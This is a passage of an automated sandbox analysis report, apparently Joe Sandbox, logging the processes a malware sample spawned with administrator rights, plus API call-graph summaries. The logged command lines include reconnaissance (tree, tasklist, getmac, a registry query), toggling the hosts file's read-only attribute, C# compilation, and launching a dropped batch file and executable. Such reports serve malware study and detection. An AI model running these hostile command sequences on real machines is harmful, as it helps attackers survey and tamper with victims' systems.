kAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:58
                                                  Start time:22:27:23
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                  Imagebase:0x7ff68db70000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:59
                                                  Start time:22:27:24
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:60
                                                  Start time:22:27:24
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\reg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                  Imagebase:0x7ff7cfbe0000
                                                  File size:77'312 bytes
                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:62
                                                  Start time:22:27:24
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\tree.com
                                                  Wow64 process (32bit):false
                                                  Commandline:tree /A /F
                                                  Imagebase:0x7ff65f020000
                                                  File size:20'992 bytes
                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:64
                                                  Start time:22:27:24
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                  Imagebase:0x7ff68db70000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:65
                                                  Start time:22:27:24
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:66
                                                  Start time:22:27:24
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\attrib.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                  Imagebase:0x7ff7e2370000
                                                  File size:23'040 bytes
                                                  MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:67
                                                  Start time:22:27:24
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                  Imagebase:0x7ff68db70000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:68
                                                  Start time:22:27:24
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:69
                                                  Start time:22:27:24
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                  Imagebase:0x7ff68db70000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:70
                                                  Start time:22:27:24
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:71
                                                  Start time:22:27:25
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\tree.com
                                                  Wow64 process (32bit):false
                                                  Commandline:tree /A /F
                                                  Imagebase:0x7ff65f020000
                                                  File size:20'992 bytes
                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:72
                                                  Start time:22:27:25
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\attrib.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                  Imagebase:0x7ff7e2370000
                                                  File size:23'040 bytes
                                                  MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:73
                                                  Start time:22:27:25
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                  Imagebase:0x7ff68db70000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:74
                                                  Start time:22:27:25
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                  Imagebase:0x7ff68db70000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:75
                                                  Start time:22:27:25
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:76
                                                  Start time:22:27:25
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:77
                                                  Start time:22:27:25
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\tree.com
                                                  Wow64 process (32bit):false
                                                  Commandline:tree /A /F
                                                  Imagebase:0x7ff65f020000
                                                  File size:20'992 bytes
                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:78
                                                  Start time:22:27:25
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\tasklist.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:tasklist /FO LIST
                                                  Imagebase:0x7ff78fca0000
                                                  File size:106'496 bytes
                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:79
                                                  Start time:22:27:25
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                  Imagebase:0x7ff68db70000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:80
                                                  Start time:22:27:25
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:81
                                                  Start time:22:27:26
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\tree.com
                                                  Wow64 process (32bit):false
                                                  Commandline:tree /A /F
                                                  Imagebase:0x7ff65f020000
                                                  File size:20'992 bytes
                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:82
                                                  Start time:22:27:26
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                  Imagebase:0x7ff68db70000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:83
                                                  Start time:22:27:26
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:84
                                                  Start time:22:27:26
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                  Imagebase:0x7ff68db70000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:85
                                                  Start time:22:27:26
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:86
                                                  Start time:22:27:26
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\getmac.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:getmac
                                                  Imagebase:0x7ff66b3c0000
                                                  File size:90'112 bytes
                                                  MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:88
                                                  Start time:22:27:26
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\tree.com
                                                  Wow64 process (32bit):false
                                                  Commandline:tree /A /F
                                                  Imagebase:0x7ff65f020000
                                                  File size:20'992 bytes
                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:90
                                                  Start time:22:27:26
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkfhm5n3\gkfhm5n3.cmdline"
                                                  Imagebase:0x7ff7262d0000
                                                  File size:2'759'232 bytes
                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:91
                                                  Start time:22:27:27
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDAF6.tmp" "c:\Users\user\AppData\Local\Temp\gkfhm5n3\CSCE3FF6834DD6C4DE392BB63A4482876F5.TMP"
                                                  Imagebase:0x7ff7274f0000
                                                  File size:52'744 bytes
                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:92
                                                  Start time:22:27:29
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\agentInto\pR9EprN9daTFn7S7o.bat" "
                                                  Imagebase:0x240000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:93
                                                  Start time:22:27:29
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:94
                                                  Start time:22:27:29
                                                  Start date:20/06/2024
                                                  Path:C:\agentInto\fontsessionruntime.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\agentInto\fontsessionruntime.exe"
                                                  Imagebase:0xd90000
                                                  File size:4'173'824 bytes
                                                  MD5 hash:6CF5F23F1C8CA3BC6342506BAAC300DA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:101
                                                  Start time:22:27:32
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\Conhost.exe
                                                  Wow64 process (32bit):
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:
                                                  Has administrator privileges:
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:140
                                                  Start time:22:27:35
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\Conhost.exe
                                                  Wow64 process (32bit):
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:
                                                  Has administrator privileges:
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:156
                                                  Start time:22:27:36
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\Conhost.exe
                                                  Wow64 process (32bit):
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:
                                                  Has administrator privileges:
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:83.7%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:40%
                                                    Total number of Nodes:5
                                                    Total number of Limit Nodes:1

                                                    Callgraph

                                                    • Executed
                                                    • Not Executed
                                                    • Opacity -> Relevance
                                                    • Disassembly available
                                                    callgraph 0 Function_00401000 1 Function_00401AE1 1->0

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCommandLineA.KERNEL32 ref: 00401AE1
                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00401AED
                                                    • GetProcessHeap.KERNEL32(00000000), ref: 00401AF7
                                                      • Part of subcall function 00401000: LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                      • Part of subcall function 00401000: LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                      • Part of subcall function 00401000: RegisterClassExA.USER32(00000030), ref: 0040106E
                                                      • Part of subcall function 00401000: CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                      • Part of subcall function 00401000: ShowWindow.USER32(00000001,?), ref: 004010BC
                                                      • Part of subcall function 00401000: UpdateWindow.USER32(00000001), ref: 004010C7
                                                      • Part of subcall function 00401000: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                      • Part of subcall function 00401000: TranslateMessage.USER32(?), ref: 004010E4
                                                      • Part of subcall function 00401000: DispatchMessageA.USER32(?), ref: 004010ED
                                                    • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B18
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1727268615.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1727251597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1727283405.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1727301157.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1727301157.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1727335914.0000000000411000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1727335914.0000000000E11000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1728235706.0000000000F84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_QIjBj1l8We.jbxd
                                                    Similarity
                                                    • API ID: MessageWindow$LoadProcess$ClassCommandCreateCursorDispatchExitHandleHeapIconLineModuleRegisterShowTranslateUpdate
                                                    • String ID:
                                                    • API String ID: 673778540-0
                                                    • Opcode ID: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
                                                    • Instruction ID: 8601b60a343ef63eca695c0712cadf30932154ab05066af7af19716e0146d46f
                                                    • Opcode Fuzzy Hash: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
                                                    • Instruction Fuzzy Hash: 72E06774959300AAE7217F71AE06B143E74E70474BF10407BF6157A1F6EB786A10AB1D

                                                    Control-flow Graph

                                                    APIs
                                                    • LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                    • RegisterClassExA.USER32(00000030), ref: 0040106E
                                                    • CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                    • ShowWindow.USER32(00000001,?), ref: 004010BC
                                                    • UpdateWindow.USER32(00000001), ref: 004010C7
                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                    • TranslateMessage.USER32(?), ref: 004010E4
                                                    • DispatchMessageA.USER32(?), ref: 004010ED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1727268615.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1727251597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1727283405.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1727301157.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1727301157.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1727335914.0000000000411000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1727335914.0000000000E11000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1728235706.0000000000F84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_QIjBj1l8We.jbxd
                                                    Similarity
                                                    • API ID: MessageWindow$Load$ClassCreateCursorDispatchIconRegisterShowTranslateUpdate
                                                    • String ID: 0$WinClass32
                                                    • API String ID: 282685165-2329282442
                                                    • Opcode ID: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                    • Instruction ID: db64ee9f6a3c3da8bd2a7b60d0102d68ead382408d30bf1f106ff4c9428f50ce
                                                    • Opcode Fuzzy Hash: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                    • Instruction Fuzzy Hash: F7213C70D44248AAEF11DFD0CD46BDDBFB8AB04708F20802AF600BA1E5D7B966459B5C

                                                    Execution Graph

                                                    Execution Coverage:83.7%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:5
                                                    Total number of Limit Nodes:1

                                                    Callgraph

                                                    • Executed
                                                    • Not Executed
                                                    • Opacity -> Relevance
                                                    • Disassembly available
                                                    callgraph 0 Function_00401000 1 Function_00401AE1 1->0

                                                    Control-flow Graph

                                                    APIs
                                                    • LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                    • RegisterClassExA.USER32(00000030), ref: 0040106E
                                                    • CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                    • ShowWindow.USER32(00000001,?), ref: 004010BC
                                                    • UpdateWindow.USER32(00000001), ref: 004010C7
                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                    • TranslateMessage.USER32(?), ref: 004010E4
                                                    • DispatchMessageA.USER32(?), ref: 004010ED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1739098277.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.1739073911.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1739124843.0000000000402000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1739156518.0000000000403000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1739156518.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1739206655.0000000000411000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1739206655.0000000000E11000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1740101998.0000000000F82000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_x12.jbxd
                                                    Similarity
                                                    • API ID: MessageWindow$Load$ClassCreateCursorDispatchIconRegisterShowTranslateUpdate
                                                    • String ID: 0$WinClass32
                                                    • API String ID: 282685165-2329282442
                                                    • Opcode ID: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                    • Instruction ID: db64ee9f6a3c3da8bd2a7b60d0102d68ead382408d30bf1f106ff4c9428f50ce
                                                    • Opcode Fuzzy Hash: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                    • Instruction Fuzzy Hash: F7213C70D44248AAEF11DFD0CD46BDDBFB8AB04708F20802AF600BA1E5D7B966459B5C

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCommandLineA.KERNEL32 ref: 00401AE1
                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00401AED
                                                    • GetProcessHeap.KERNEL32(00000000), ref: 00401AF7
                                                      • Part of subcall function 00401000: LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                      • Part of subcall function 00401000: LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                      • Part of subcall function 00401000: RegisterClassExA.USER32(00000030), ref: 0040106E
                                                      • Part of subcall function 00401000: CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                      • Part of subcall function 00401000: ShowWindow.USER32(00000001,?), ref: 004010BC
                                                      • Part of subcall function 00401000: UpdateWindow.USER32(00000001), ref: 004010C7
                                                      • Part of subcall function 00401000: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                      • Part of subcall function 00401000: TranslateMessage.USER32(?), ref: 004010E4
                                                      • Part of subcall function 00401000: DispatchMessageA.USER32(?), ref: 004010ED
                                                    • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B18
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1739098277.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.1739073911.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1739124843.0000000000402000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1739156518.0000000000403000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1739156518.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1739206655.0000000000411000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1739206655.0000000000E11000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1740101998.0000000000F82000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_x12.jbxd
                                                    Similarity
                                                    • API ID: MessageWindow$LoadProcess$ClassCommandCreateCursorDispatchExitHandleHeapIconLineModuleRegisterShowTranslateUpdate
                                                    • String ID:
                                                    • API String ID: 673778540-0
                                                    • Opcode ID: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
                                                    • Instruction ID: 8601b60a343ef63eca695c0712cadf30932154ab05066af7af19716e0146d46f
                                                    • Opcode Fuzzy Hash: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
